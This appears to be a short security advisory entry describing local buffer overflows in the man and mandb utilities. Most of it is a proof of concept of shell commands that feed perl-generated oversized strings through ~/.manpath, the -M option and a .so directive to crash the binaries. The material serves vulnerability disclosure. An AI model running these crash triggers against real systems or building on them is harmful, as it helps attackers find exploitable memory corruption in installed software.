|
Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
The following proof of concept has been supplied: # cd /tmp # mkdir x # echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath # mandb Segmentation fault (can also apply this to the "man" binary, by fooling it with links) # cd /tmp # mkdir x # ln /usr/bin/man mandb # echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath # ./mandb Segmentation fault # man -M `perl -e 'print"/"x2100'`usr/share/man ls ...(verbose) Segmentation fault # cd /tmp # mkdir man man/man1 # echo .so `perl -e 'print"x"x1024'` >man/man1/x.1 # man -M /tmp/man x ...(verbose) Segmentation fault # man -M `perl -e 'print"/tmp:"x260'` x Segmentation fault |
|
|
Privacy Statement |